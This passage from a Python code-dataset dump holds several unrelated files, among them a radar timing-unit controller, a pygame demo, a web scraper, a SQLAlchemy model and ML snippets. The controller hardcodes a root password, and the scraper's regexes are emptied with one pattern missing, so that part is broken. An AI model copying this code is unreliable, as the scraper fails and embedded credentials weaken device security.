M*Graph.edgeAve(xe[:,self.nopen:2*self.nopen,:])\n\n xn = M*(xn - self.h * (divE + aveE))\n\n xn = F.conv1d(xn, self.Kclose.unsqueeze(2))\n return xn\n\ndef colisionDetection(P, M, contact=6.0):\n\n ind = M.squeeze() > 0\n P = P[:, :, ind].squeeze(0)\n p = torch.sum(P ** 2, dim=0, keepdim=True)\n DP = torch.triu(torch.sqrt(torch.relu(p + p.t() - 2 * P.t() @ P)), 1)\n\n con = (DP < contact)\n\n DP = DP[con]\n a = (DP > 0)\n DP = DP[a]\n\n ecol = -torch.log(DP/contact)\n ecol = ecol.sum()\n\n return ecol\n\n\ndef updateCoords(enet, X0, xnS, Graph, lrX=1e-1, iter=100, Emin=0, ratio=0.8):\n ###### Optimize over X - Generator\n Xp = torch.clone(X0).detach()\n Xp.requires_grad = True\n optimizerE = optim.SGD([{'params': Xp, 'lr': lrX}])\n M = torch.ones(1,1, X0.shape[-1])\n for i in range(iter):\n optimizerE.zero_grad()\n #Xpp, res = cons.proj(Xp, 100, 1e-2)\n Xpp = Xp\n ep = enet(xnS,Xpp, Graph)\n Ep = 0.5*(ep**2).mean()\n Ec = colisionDetection(Xpp.squeeze(1), M, contact=6.0)\n\n Etotal = Ep + Ec\n Etotal.backward()\n torch.nn.utils.clip_grad_value_(Xp, 0.1)\n optimizerE.step()\n\n dRMSD = utils.lossFundRMSD(Xpp.squeeze(0), X0.squeeze(0), M, contact=1e3)\n dX = torch.mean(torch.abs(Xp-X0))\n print(' Eiter = %2d rloss = %3.2e Ep = %3.2e Ec = %3.2e dRMSD = %3.2e |dX| = %3.2e'%\n (i, Emin/Etotal, Ep, Ec, dRMSD, dX))\n if Etotal < ratio*Emin:\n return Xp, Ep\n return Xp, Etotal\n","sub_path":"energyNetwork.py","file_name":"energyNetwork.py","file_ext":"py","file_size_in_byte":7790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"74368412","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 4 13:13:52 2021\n\n@author: Lenovo-PC\n\"\"\"\n\n# import pygame module in this program\nimport pygame;\nimport animate;\n\n# activate the pygame library .\n# initiate pygame and give permission\n# to use pygame's functionality.\npygame.init()\n\n# create the display surface object\n# of specific dimension..e(500, 500).\nwin = pygame.display.set_mode((600, 600))\n\n# set the pygame window name\npygame.display.set_caption(\"Moving rectangle\")\n\n# object current co-ordinates\nx = 200\ny = 200\na=100\nb=100\n# dimensions of the object\nwidth = 20\nheight = 20\n\n# velocity / speed of movement\nvel = 10\nanimate.resetStateToInitialConditions()\nx = animate.state[\"positions\"][0][\"x\"]\nprint(animate.state[\"positions\"][0][\"x\"])\nprint(x)\ny = animate.state[\"positions\"][0][\"y\"]\na=animate.state[\"positions\"][1][\"x\"]\nb=animate.state[\"positions\"][1][\"y\"]\n# Indicates pygame is running\nrun = True\n\n# infinite loop\nwhile run:\n # creates time delay of 10ms\n pygame.time.delay(10)\n \n # iterate over the list of Event objects\n # that was returned by pygame.event.get() method.\n for event in pygame.event.get():\n \n # if event object type is QUIT\n # then quitting the pygame\n # and program both.\n if event.type == pygame.QUIT:\n \n # it will make exit the while loop\n run = False\n # stores keys pressed\n \n \n \n # completely fill the surface object\n # with black colour\n win.fill((0, 0, 0))\n \n # drawing object on screen which is rectangle here\n\n \n \n \n \n \n \n # it refreshes the window\n animate.updatePosition() \n print(animate.state[\"positions\"][0][\"x\"])\n pygame.draw.circle(win, (204, 255, 255), animate.coord(a,b), 15)\n pygame.draw.circle(win, (255,255,255), animate.coord(x,y), 15)\n pygame.display.update()\n print(animate.coord(a,b))\n print(animate.coord(x,y))\n \n\n# closes the pygame window\npygame.quit()\n","sub_path":"object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455222096","text":"# -*- coding:utf-8 -*-\r\nimport re\r\nimport dataNode\r\n\r\nclass Node():\r\n __url = ''\r\n __refPattern = re.compile(r'.*?',re.S)\r\n __datePattern = re.compile(r'[\\d-]*')\r\n\r\n def __init__(self):\r\n self.__url = \"http://www.sis.zju.edu.cn\"\r\n\r\n def __del__(self):\r\n pass\r\n\r\n def getUrl(self):\r\n return self.__url\r\n\r\n # 获取一行信息中的各个部分, 包括 title, url 和 time\r\n def extractOne(self, oneLine):\r\n time = ''\r\n title = ''\r\n url = ''\r\n ref = self.__refPattern.search(oneLine)\r\n url = ref.group()\r\n url = url[url.find('\"')+1:]\r\n name = self.__titlePattern.search(oneLine)\r\n title = name.group()\r\n title = title[8:-4]\r\n date = self.__datePattern.search(oneLine)\r\n time = date.group()\r\n time = time[4:-5]\r\n return [title,url,time]\r\n\r\n\r\n def extract(self, plainTxt):\r\n plainTxt = unicode(plainTxt, 'utf-8')\r\n plainTxt = plainTxt[plainTxt.find(u''):]\r\n plainTxt = plainTxt[:plainTxt.find(u'')]\r\n pattern = re.compile(u'.*?
',re.S)\r\n\r\n matchs = pattern.findall(plainTxt)\r\n\r\n patternTr = re.compile(u'.*?',re.S)\r\n\r\n ret = []\r\n\r\n for match in matchs:\r\n lines = patternTr.findall(match)\r\n for line in lines:\r\n data = self.extractOne(line)\r\n element = dataNode.dataNode(data[0],\r\n self.__url + data[1],\r\n data[2])\r\n ret.append(element)\r\n\r\n# sorted(ret, cmp = dataNode.cmpNode)\r\n ret = sortList(ret)\r\n return ret\r\n\r\ndef sortList(l1):\r\n l2 = []\r\n l1.sort(dataNode.cmpNode)\r\n for i in range(len(l1) - 1):\r\n if dataNode.cmpNode(l1[i], l1[i+1]) != 0:\r\n l2.append(l1[i])\r\n l2.append(l1[-1])\r\n return l2\r\n","sub_path":"fromSIS.py","file_name":"fromSIS.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350582736","text":"#!/usr/local/bin/python3.8\nList=[1,-2,3,4,6]\neven=0\nodd=0\nnegative=0\nfor i in List:\n if i > 0:\n if i%2 == 0:\n even=even+i\n else:\n odd=odd+i\n else:\n negative=negative+i\nprint (\"List is:\",List)\nprint (\"Sum of Even Number From List: \",even)\nprint (\"Sum of Odd Number From List: \",odd)\nprint (\"Sum of Negative Number From List: \",negative)\n","sub_path":"python_10082020/SumOfEvenOddNegative.py","file_name":"SumOfEvenOddNegative.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"409839988","text":"from sqlalchemy import Column, String, Integer, BigInteger, DateTime\n\nfrom app import db\n\n\nclass User(db.Model):\n __tablename__ = \"users\"\n\n c_id = Column(\"id\", Integer, primary_key=True)\n c_join = Column(\"join\", DateTime)\n\n c_twi_id = Column(\"twi_id\", BigInteger)\n c_twi_token = Column(\"twi_token\", String(60))\n c_twi_secret = Column(\"twi_secret\", String(120))\n\n c_wei_id = Column(\"wei_id\", BigInteger)\n c_wei_token = Column(\"wei_token\", String(60))\n c_wei_expire = Column(\"wei_expire\", DateTime)\n\n def __repr__(self):\n return \"\" % (self.c_username, str(self.c_join))\n\n @property\n def is_linked_to_twi(self):\n return self.c_twi_id is not None\n\n @property\n def is_linked_to_wei(self):\n return self.c_wei_id is not None\n\n def update_fields(self, fields, instant_save=True):\n for field, value in fields.items():\n setattr(self, field, value)\n if instant_save:\n db.session.commit()\n\n @staticmethod\n def merge_user(del_user, left_user, update_fields=None, by_join_order=False, instant_save=True):\n \"\"\" 合并两个 user, del_user 是合并后被删除的 user, left_user 是合并后保存的 user,\n update_fields 是手动更新的 fields, left_user 对应的 fields 会强制更新\n 如果 by_join_order 为 True, 则不管传入的 user 顺序, 把加入时间靠后的用户删除\n 这个函数的目的是为了简化以后可能会出现的比较复杂的用户合并情景\n \"\"\"\n\n if by_join_order:\n del_user, left_user = sorted([del_user, left_user], key=lambda u: u.c_join, reverse=True)\n\n columns = [c for c in left_user.__dict__ if c.startswith('c_')]\n if update_fields is None:\n update_fields = dict()\n for column in columns:\n # 不在手动更新序列中, 并且 left_user 这个 filed 的 value 为空, 则使用 del_user 的 value\n if column not in update_fields and not getattr(left_user, column):\n if getattr(del_user, column):\n setattr(left_user, column, getattr(del_user, column))\n\n left_user.update_fields(update_fields, False)\n\n if instant_save:\n db.session.delete(del_user)\n db.session.commit()\n","sub_path":"app/models/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453809862","text":"import sys\nimport os.path\nimport argparse\nimport time\nimport logging\nimport npyscreen\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QTableWidget, QTableWidgetItem\n\nfrom controller_v2_gui import Ui_MainWindow\nimport harpoon\nfrom harpoon.boardsupport import borph\nfrom parser import TCUParams\n\n\nclass TCUController(harpoon.Project):\n \"\"\"\n Class that controls NeXtRAD's Timing Control unit\n Making use of the Harpoon Framework\n \"\"\"\n\n def __init__(self,\n fpga_con,\n name='tcu_controller',\n description='project to communicate with the RHINO-TCU',\n cores=list(),\n address=None,\n headerfile=None,\n verify=False,\n bof_exe=None,\n debug=False,\n log_dir=str(),\n auto_update=False,\n auto_arm=False,\n voice=False\n ):\n \"\"\"creates a new instance of TCUController\n\n :param harpoon.FPGAConnection: Class to facilitate the low level communication between PC and TCU\n :param str name: name of the project\n :param str description: description of the project\n :param list cores: harpoon.cores associated to this project\n :param str address: IP address of TCU\n :param str headerfile: name and path of the headerfile containing TCU parameters\n :param str bof_exe: name of the .bof executable residing in the TCU\n :param bool debug: display debug output to console\n :param str log_dir: path to store log file\n :param bool auto_update: automatically update registers when header file has changed\n :param bool auto_arm: automatically update registers AND arm the TCU when header file has changed\n :param bool voice: voice prompts\n \"\"\"\n\n harpoon.Project.__init__(self, name, description, cores)\n\n self.fpga_con = fpga_con\n self.address = address\n self.headerfile = headerfile\n self.verify = verify\n self.bof_exe = bof_exe\n self.auto_arm = auto_arm\n if self.auto_arm:\n self.auto_update = True\n else:\n self.auto_update = auto_update\n self.voice = voice\n\n self.is_connected = False\n self.is_running = False\n\n self._init_logger(log_dir, debug)\n\n self.logger.debug('TCUController controller instance created with args:')\n self.logger.debug('\\taddress = {}'.format(self.address))\n self.logger.debug('\\theaderfile = {}'.format(self.headerfile))\n self.logger.debug('\\tbof_exe = {}'.format(self.bof_exe))\n self.logger.debug('\\tauto_arm = {}'.format(self.auto_arm))\n self.logger.debug('\\tauto_update = {}'.format(self.auto_update))\n self.logger.debug('\\tvoice = {}'.format(self.voice))\n\n self.init_headerfile_thread()\n\n def _init_logger(self, log_dir='', debug=False):\n self.logger = logging.getLogger('tcu_project_logger')\n self.logger.setLevel(logging.DEBUG)\n self.log_dir = log_dir\n # create file handler which logs even debug messages\n fh = logging.FileHandler(self.log_dir+'tcu_'+self.fpga_con.address+'.log')\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n if debug is True:\n ch.setLevel(logging.DEBUG)\n else:\n ch.setLevel(logging.INFO)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n formatter2 = logging.Formatter('[%(levelname)s] %(message)s')\n ch.setFormatter(formatter2)\n fh.setFormatter(formatter)\n # add the handlers to logger\n # use logging.getLogger() with no params to get all the other loggers from imported modules\n logging.getLogger().addHandler(fh)\n self.logger.addHandler(ch)\n\n def init_headerfile_thread(self):\n if self.headerfile is not None:\n watched_dir = os.path.split(self.headerfile)[0] # os.path.split() returns tuple (path, filename)\n print('watched_dir = {watched_dir}'.format(watched_dir=watched_dir))\n patterns = [self.headerfile]\n print('patterns = {patterns}'.format(patterns=', '.join(patterns)))\n self.event_handler = FileEventHandler(self.logger, patterns=patterns)\n self.observer = Observer()\n self.observer.schedule(self.event_handler, watched_dir, recursive=False)\n self.observer.start()\n else:\n self.logger.warn('no headerfile path given, cannot start headerfile monitor')\n\n def connect(self):\n if self.address is not None:\n self.logger.info('initializing rhino connection, IP address: ' + self.address)\n try:\n self.fpga_con.connect()\n self.is_connected = True\n self.power_fmc()\n self.logger.info('connection successful!')\n if self.voice:\n os.system('spd-say -t female1 -i -0 \"connected\" -r -30 -p -30')\n except Exception as e:\n self.logger.exception('failed to connect to tcu')\n else:\n self.logger.error('IP address not set, cannot connect.')\n\n def disconnect(self):\n self.logger.info('disconnecting from tcu...')\n try:\n self.fpga_con.disconnect()\n self.logger.info('disconnect successful!')\n except Exception as e:\n self.logger.exception('failed to disconnect from tcu')\n\n def power_fmc(self):\n self.logger.debug('calling power_fmc.sh script...')\n fpga_con._action('./power_fmc.sh')\n # time.sleep(3)\n # self.fpga_con._action('echo 102 > /sys/class/gpio/export')\n # self.fpga_con._action('echo out > /sys/class/gpio/gpio102/direction')\n # self.fpga_con._action('echo 1 > /sys/class/gpio/gpio102/value')\n # self.fpga_con._action('echo out > /sys/class/gpio/gpio100/direction')\n # self.fpga_con._action('echo 1 > /sys/class/gpio/gpio100/value')\n\n def start(self):\n if fpga_con.ssh_connected():\n self.logger.info('starting bof...')\n self.fpga_con.launch_bof(self.bof_exe, link=True)\n if self.fpga_con.running():\n self.logger.info('bof started!')\n else:\n self.logger.error('failed to start bof \\'{}\\' on TCU \\'{}\\', please check log file \\'{}\\''\n .format(self.bof_exe,self.address, self.log_dir+'tcu_'+self.fpga_con.address+'.log'))\n else:\n self.logger.error('cannot start bof without connection, connect to TCU first. Use tcu.connect() method.')\n\n def stop(self):\n if fpga_con.ssh_connected():\n self.logger.info('stopping .bof...')\n self.fpga_con.kill_bof()\n else:\n self.logger.error('cannot kill bof without connection, connect to TCU first. Use tcu.connect() method')\n\n def parse_header(self):\n self.logger.info('parsing header file...')\n self.tcu_params = TCUParams(self.headerfile)\n self.logger.debug('Extracted parameters from header:\\n' + str(self.tcu_params))\n\n def write_registers(self):\n if fpga_con.ssh_connected():\n if fpga_con.running():\n self.logger.info('writing registers...')\n params = self.tcu_params.get_int_params()\n reg_num_repeats.write(params['num_repeats'])\n reg_num_pulses.write(params['num_pulses'])\n reg_x_amp_delay.write(params['x_amp_delay'])\n reg_l_amp_delay.write(params['l_amp_delay'])\n reg_rex_delay.write(params['rex_delay'])\n reg_pri_pulse_width.write(params['pri_pulse_width'])\n reg_pre_pulse.write(params['pre_pulse'])\n\n # need to do a bit more work for reg_pulses,\n # as it is a more complex data structure\n hex_params = self.tcu_params.get_hex_params()\n pulses = hex_params['pulses']\n pulse_param_str = str()\n for pulse in pulses:\n pulse_param_str += pulse['pulse_width'].replace('\\\\x', '') \\\n + pulse['pri'].replace('\\\\x', '') \\\n + pulse['pol_mode'].replace('\\\\x', '') \\\n + pulse['frequency'].replace('\\\\x', '')\n\n pulse_param_bytearray = bytearray.fromhex(pulse_param_str)\n reg_pulses.write_bytes(pulse_param_bytearray, raw=True)\n\n self.logger.debug('registers written')\n if self.verify:\n self.logger.debug('checking registers...')\n self.check_regs()\n else:\n self.logger.error('No bof running, cannot perform register writes. Use tcu.start() method.')\n\n else:\n self.logger.error('No ssh connection to TCU, cannot perform register writes. Use tcu.connect() method')\n\n def check_regs(self):\n \"\"\"reads back the TCU registers and compares them with the parameters sent\"\"\"\n if fpga_con.ssh_connected():\n if fpga_con.running():\n self.logger.info('verifying registers...')\n params = self.tcu_params.get_int_params()\n register_value_correct = True\n if self.check_reg(reg_num_repeats, params['num_repeats']) == False:\n register_value_correct = False\n if self.check_reg(reg_num_pulses, params['num_pulses']) == False:\n register_value_correct = False\n if self.check_reg(reg_x_amp_delay, params['x_amp_delay']) == False:\n register_value_correct = False\n if self.check_reg(reg_l_amp_delay, params['l_amp_delay']) == False:\n register_value_correct = False\n if self.check_reg(reg_rex_delay, params['rex_delay']) == False:\n register_value_correct = False\n if self.check_reg(reg_pri_pulse_width, params['pri_pulse_width']) == False:\n register_value_correct = False\n if self.check_reg(reg_pre_pulse, params['pre_pulse']) == False:\n register_value_correct = False\n\n # need to do a bit more work for reg_pulses,\n # as it is a more complex data structure\n hex_params = self.tcu_params.get_hex_params(hdl_format=True)\n pulses = hex_params['pulses']\n pulse_param_str = str()\n for pulse in pulses:\n pulse_param_str += pulse['pulse_width'].replace('\\\"', '') + pulse['pri'].replace('\\\"', '') + pulse['pol_mode'].replace('\\\"', '') + pulse['frequency'].replace('\\\"', '')\n pulse_param_str = pulse_param_str.replace('x', '')\n\n num_pulses = reg_num_pulses.read()\n read_value = reg_pulses.read_bytes()[0:(10*num_pulses)]\n read_value_str = str()\n\n if sys.version_info >= (3, 6):\n for pulse_index in range(num_pulses):\n # print('pulse[{}]'.format(pulse_index))\n pulse_width = read_value[pulse_index*10 + 0:pulse_index*10 + 2]\n # print('pw {}'.format(pulse_width.hex()))\n pri = read_value[pulse_index*10 + 4:pulse_index*10 + 6] + read_value[pulse_index*10 + 2:pulse_index*10 + 4]\n # print('pri {}'.format(pri.hex()))\n mode = read_value[pulse_index*10 + 6:pulse_index*10 + 8]\n # print('mode {}'.format(mode.hex()))\n freq = read_value[pulse_index*10 + 8:pulse_index*10 + 10]\n # print('freq {}'.format(freq.hex()))\n read_value_str += pulse_width.hex() + pri.hex() + mode.hex() + freq.hex()\n if read_value_str == pulse_param_str:\n self.logger.debug('Register \\'{}\\' verified'.format('pulses'))\n else:\n self.logger.error('Value mismatch for register \\'{}\\' retrieved {}, expected {}'.format('pulses', read_value_str, pulse_param_str))\n register_value_correct = False\n else:\n self.logger.warning('cannot verify the pulses register. needs Python >= 3.6')\n\n if register_value_correct:\n self.logger.debug('All registers have been verified')\n else:\n self.logger.error('One or more registers contain incorrect value(s) - see {} for details'.format(self.log_dir+'tcu_'+self.fpga_con.address+'.log'))\n else:\n self.logger.error('No bof running, cannot perform register reads. Use tcu.start() method.')\n\n else:\n self.logger.error('No ssh connection to TCU, cannot perform register reads. Use tcu.connect() method.')\n\n def check_reg(self, register, expected_value):\n \"\"\"returns True if the contents of given register matches a given value\"\"\"\n read_value = register.read()\n if read_value == expected_value:\n self.logger.debug('Register \\'{}\\' verified'.format(register.name))\n return True\n else:\n self.logger.error('Value mismatch for register \\'{}\\' retrieved {}, expected {}'\n .format(register.name, read_value, expected_value))\n return False\n\n def arm(self):\n \"\"\"arms the TCU\"\"\"\n if fpga_con.ssh_connected():\n if fpga_con.running():\n self.logger.info('arming tcu...')\n reg_instruction.write(0)\n # time.sleep(3)\n reg_instruction.write(1)\n if self.voice:\n os.system('spd-say -t female1 -i -0 \"armed\" -r -30 -p -30')\n else:\n self.logger.error('No bof running TCU, cannot arm TCU. Use tcu.start() method.')\n\n else:\n self.logger.error('No ssh connection to TCU, cannot arm TCU. Use tcu.connect() method.')\n\n\nclass FileEventHandler(PatternMatchingEventHandler):\n \"\"\"Overriding PatternMatchingEventHandler to handle when headerfile changes.\"\"\"\n def __init__(self, logger, patterns):\n super(FileEventHandler, self).__init__(patterns=patterns)\n self.logger = logger\n\n def on_modified(self, event):\n super(FileEventHandler, self).on_modified(event)\n self.logger.info('headerfile changed')\n if tcu.auto_update:\n if tcu.voice:\n os.system('spd-say -t female1 -i -30 \"updated\" -r -30')\n tcu.parse_header()\n tcu.write_registers()\n if tcu.auto_arm:\n print('arming tcu')\n tcu.arm()\n\n\nfpga_con = borph.RHINO(username='root', password='rhino', login_timeout=30) # default credentials for RHINO\n\n# -----------------------------------------------------------------------------\n# CORE INSTANTIATION\n# -----------------------------------------------------------------------------\ncore_tcu = harpoon.IPCore('tcu_core', 'Timing control unit', fpga_con)\n\n# -----------------------------------------------------------------------------\n# REGISTER INSTANTIATION\n# -----------------------------------------------------------------------------\nreg_pulses = harpoon.Register('pulses',\n 'Block of pulses in experiment',\n int, 140, 3, core_tcu)\nreg_num_repeats = harpoon.Register('num_repeats',\n 'Number of repeats for each pulse',\n int, 4, 3, core_tcu)\nreg_num_pulses = harpoon.Register('num_pulses',\n 'Number of pulses',\n int, 2, 3, core_tcu)\nreg_x_amp_delay = harpoon.Register('x_amp_delay',\n 'Switch-off delay for X band amplifier',\n int, 2, 3, core_tcu)\nreg_l_amp_delay = harpoon.Register('l_amp_delay',\n 'Switch-off delay for X band amplifier',\n int, 2, 3, core_tcu)\nreg_rex_delay = harpoon.Register('rex_delay',\n 'Delay for REX to output RF after PRI signal',\n int, 2, 3, core_tcu)\nreg_pri_pulse_width = harpoon.Register('pri_pulse_width',\n 'Pulse width of PRI signal',\n int, 4, 3, core_tcu)\nreg_pre_pulse = harpoon.Register('pre_pulse',\n 'Pre pulse duration before the main bang',\n int, 2, 3, core_tcu)\nreg_status = harpoon.Register('status',\n 'Current state of the TCU',\n int, 2, 1, core_tcu)\nreg_instruction = harpoon.Register('instruction',\n 'Control register for TCU',\n int, 2, 3, core_tcu)\n\n# add list of registers to the core\n# TODO: fix this reverse dependency between core and registers\nregisters = [\n reg_pulses,\n reg_num_repeats,\n reg_num_pulses,\n reg_x_amp_delay,\n reg_l_amp_delay,\n reg_rex_delay,\n reg_pri_pulse_width,\n reg_pre_pulse,\n reg_status,\n reg_instruction\n ]\ncore_tcu.registers = registers\n\n\nclass ControllerGUI(Ui_MainWindow):\n \"\"\"docstring for TCUPulseParamsGUILogic.\"\"\"\n\n def __init__(self, window):\n Ui_MainWindow.__init__(self)\n self.setupUi(window)\n self.but_headerfile.clicked.connect(self.read_header)\n\n self.timer = QtCore.QTimer()\n self.timer.setSingleShot(False)\n self.timer.timeout.connect(self.refresh)\n self.timer.start(3000)\n\n def read_header(self, arg):\n print('Clicked read_header button')\n tcu.parse_header()\n # time.sleep(10)\n\n def refresh(self):\n print('refreshing')\n\n\nclass TCUMonitorForm(npyscreen.Form):\n\n def afterEditing(self):\n self.parentApp.setNextForm(None)\n\n def create(self):\n self.count = 0\n self.keypress_timeout = 10 # refresh period in 100ms (10 = 1s)\n self.text_address = self.add(npyscreen.TitleText, name='IP Address', editable=False, value='xxx.xxx.xxx.xxx')\n self.text_connection = self.add(npyscreen.TitleText, name='Connection', editable=False, value='?')\n self.text_state = self.add(npyscreen.TitleText, name='State', editable=False, value='?')\n self.text_num_pulses = self.add(npyscreen.TitleText, name='Pulses', editable=False, value='?')\n self.text_num_repeats = self.add(npyscreen.TitleText, name='Repeats', editable=False, value='?')\n self.text_pre_pulse = self.add(npyscreen.TitleText, name='Pre Pulse', editable=False, value='?')\n self.text_x_amp_delay = self.add(npyscreen.TitleText, name='X Amp Delay', editable=False, value='?')\n self.text_l_amp_delay = self.add(npyscreen.TitleText, name='L Amp Delay', editable=False, value='?')\n self.text_rex_delay = self.add(npyscreen.TitleText, name='Rex Delay', editable=False, value='?')\n # self.grid_pulses = self.add(npyscreen.GridColTitles, name='Pulses', editable=False, column_width=10, height=7, max_height=10)\n # self.grid_pulses.col_titles =[ 'Pulse', 'Pulse Width', 'PRI', 'Mode', 'Frequency']\n # self.grid_pulses.values = [\n # ['0', '10.0', '1000', '0', '1300'],\n # ['1', '10.0', '1000', '1', '1300'],\n # ['2', '10.0', '1000', '2', '1300'],\n # ['3', '10.0', '1000', '3', '1300'],\n # ['4', '10.0', '1000', '4', '8500'],\n # ['5', '10.0', '1000', '5', '8500'],\n # ]\n self.button_arm = self.add(npyscreen.ButtonPress, name='Arm')\n self.button_arm.whenPressed = self.when_pressed_arm\n\n def when_pressed_arm(self):\n pass\n # self.button_arm.name = 'disarm'\n\n def while_waiting(self):\n # called every keypress_timeout period when user not interacting\n self.text_address.value = str(tcu.address)\n state = reg_status.read()\n if state == 0:\n self.text_state.value = 'IDLE'\n elif state == 1:\n self.text_state.value = 'ARMED'\n elif state == 2:\n self.text_state.value = 'RUNNING'\n elif state == 3:\n self.text_state.value = 'DONE'\n else:\n self.text_state.value = '???'\n if self.text_state.value == 1 or self.text_state.value == 2:\n self.button_arm.name = 'disarm'\n else:\n self.button_arm.name = 'arm'\n self.text_num_pulses.value = str(reg_num_pulses.read())\n self.text_num_repeats.value = str(reg_num_repeats.read())\n self.text_pre_pulse.value = str(reg_pre_pulse.read())\n self.text_x_amp_delay.value = str(reg_x_amp_delay.read())\n self.text_l_amp_delay.value = str(reg_l_amp_delay.read())\n self.text_rex_delay.value = str(reg_rex_delay.read())\n self.display()\n\n\nclass TCUMonitorApplication(npyscreen.NPSAppManaged):\n def onStart(self):\n self.addForm('MAIN', TCUMonitorForm, name='TCU MONITOR')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(usage='tcu_controller [address]',\n description='Controller script for '\n 'NeXtRAD\\'s Timing Control Unit')\n parser.add_argument('address', help='IP address of TCU')\n parser.add_argument('-f', '--file', help=\"header file\")\n parser.add_argument('-b', '--bof', help='name of .bof file to be executed '\n 'on RHINO [\\'tcu_v2.bof\\']', default='tcu_v2.bof')\n parser.add_argument('-t', '--timeout', help='login timeout (seconds) to '\n 'establish SSH connection to RHINO [30]',\n type=int, default=30)\n parser.add_argument('-d', '--debug', help='display debug messages to STDOUT',\n action='store_true', default=False)\n parser.add_argument('-u', '--auto_update', help='automatically update '\n 'registers when header file has changed',\n action='store_true', default=False)\n parser.add_argument('-a', '--auto_arm', help='automatically update registers '\n 'AND arm the TCU when header file has changed',\n action='store_true', default=False)\n parser.add_argument('-v', '--voice', help='enable voice prompts',\n action='store_true', default=False)\n parser.add_argument('-c', '--check_regs', help='verify registers after writing',\n action='store_true', default=False)\n parser.add_argument('-l', '--logdir', help='directory to store log file '\n '[\\'/tmp/\\']', default='/tmp/')\n parser.add_argument('-g', '--gui', action=\"store_true\", default=False)\n parser.add_argument('-m', '--monitor', action=\"store_true\", default=False)\n parser.add_argument('-k', '--kill', help='kill running .bof',\n action=\"store_true\", default=False)\n parser.add_argument('-i', '--init', help='automatically connect and initialize '\n 'TCU',\n action=\"store_true\", default=False)\n args = parser.parse_args()\n\n fpga_con.address = args.address\n fpga_con.login_timeout = args.timeout\n\n tcu = TCUController(name='tcu_controller',\n description='project to communicate with the RHINO-TCU',\n cores=[core_tcu],\n fpga_con=fpga_con,\n address=args.address,\n bof_exe=args.bof,\n headerfile=args.file,\n verify=args.check_regs,\n debug=args.debug,\n log_dir=args.logdir,\n auto_update=args.auto_update,\n auto_arm=args.auto_arm,\n voice=args.voice\n )\n\n if args.init is True:\n tcu.connect()\n tcu.start()\n\n if args.monitor is True:\n tcu.connect()\n tcu.start()\n app = TCUMonitorApplication()\n app.run()\n\n if args.gui is True:\n app = QtWidgets.QApplication(sys.argv)\n\n window = QtWidgets.QMainWindow()\n\n program = ControllerGUI(window)\n\n window.show()\n\n sys.exit(app.exec_())\n","sub_path":"tcu_software/controller_v2.py","file_name":"controller_v2.py","file_ext":"py","file_size_in_byte":25122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378603726","text":"from sklearn.naive_bayes import MultinomialNB\nfrom sklearn.datasets import fetch_20newsgroups\n#all categories\n#newsgroup_train = fetch_20newsgroups(subset='train')\n#part categories\ncategories = ['comp.graphics',\n 'comp.os.ms-windows.misc',\n 'comp.sys.ibm.pc.hardware',\n 'comp.sys.mac.hardware',\n 'comp.windows.x'];\nfrom sklearn import metrics\nnewsgroup_train = fetch_20newsgroups(subset = 'train',categories = categories);\nnewsgroups_test = fetch_20newsgroups(subset = 'test',\n categories = categories);\nprint(newsgroup_train.target)\n#create the Multinomial Naive Bayesian Classifier\n# clf = MultinomialNB(alpha = 0.01)\n# clf.fit(fea_train,newsgroup_train.target);\n# pred = clf.predict(fea_test);\n# calculate_result(newsgroups_test.target,pred);","sub_path":"new/ceshi.py","file_name":"ceshi.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569221329","text":"import argparse\nfrom typing import Any, Dict, List, Sequence, Tuple\nfrom solo.utils.metrics import accuracy_at_k, weighted_mean\nfrom copy import deepcopy, copy\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom solo.losses.byol import byol_loss_func\nfrom solo.methods.base import BaseMomentumModel\nfrom solo.utils.momentum import initialize_momentum_params\n\nfrom solo import metrics_utils\n\nclass BYOL(BaseMomentumModel):\n def __init__(\n self,\n output_dim: int,\n proj_hidden_dim: int,\n pred_hidden_dim: int,\n **kwargs,\n ):\n \"\"\"Implements BYOL (https://arxiv.org/abs/2006.07733).\n\n Args:\n output_dim (int): number of dimensions of projected features.\n proj_hidden_dim (int): number of neurons of the hidden layers of the projector.\n pred_hidden_dim (int): number of neurons of the hidden layers of the predictor.\n \"\"\"\n\n super().__init__(**kwargs)\n\n # projector\n self.projector = nn.Sequential(\n nn.Linear(self.features_dim, proj_hidden_dim),\n nn.BatchNorm1d(proj_hidden_dim),\n nn.ReLU(),\n nn.Linear(proj_hidden_dim, output_dim),\n )\n\n # momentum projector\n self.momentum_projector = nn.Sequential(\n nn.Linear(self.features_dim, proj_hidden_dim),\n nn.BatchNorm1d(proj_hidden_dim),\n nn.ReLU(),\n nn.Linear(proj_hidden_dim, output_dim),\n )\n initialize_momentum_params(self.projector, self.momentum_projector)\n\n # predictor\n self.predictor = nn.Sequential(\n nn.Linear(output_dim, pred_hidden_dim),\n nn.BatchNorm1d(pred_hidden_dim),\n nn.ReLU(),\n nn.Linear(pred_hidden_dim, output_dim),\n )\n\n @staticmethod\n def add_model_specific_args(parent_parser: argparse.ArgumentParser) -> argparse.ArgumentParser:\n parent_parser = super(BYOL, BYOL).add_model_specific_args(parent_parser)\n parser = parent_parser.add_argument_group(\"byol\")\n\n # projector\n 